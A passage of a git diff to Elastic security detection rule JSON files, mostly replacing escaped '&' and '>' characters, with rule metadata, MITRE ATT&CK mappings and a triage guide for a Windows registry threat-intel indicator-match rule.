"ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json index 8f3b3f7e3bc..4700329397a 100644 --- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json index c007c86f791..069235cd319 100644 --- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json index 157c76fae1b..6fd965b6bc4 100644 --- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json index 81bf44f4f08..dd6a5ae006c 100644 --- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json +++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json index 53fac43041c..5d088821f31 100644 --- a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json index 6f9c3d45e8b..b1f686b083d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json index c27a0d53e9b..0cab901463f 100644 --- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json @@ -113,7 +113,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json index 59ee1b0755f..ab16f02b7d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Windows Registry Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "registry.path:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -115,7 +115,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json index 434d88ff4cb..a31c3652ac0 100644 --- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json +++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Windows Registry Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "registry.path:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -115,7 +115,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json index afd808c0992..7be4f3f7fdb 100644 --- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json +++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Windows Registry Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence 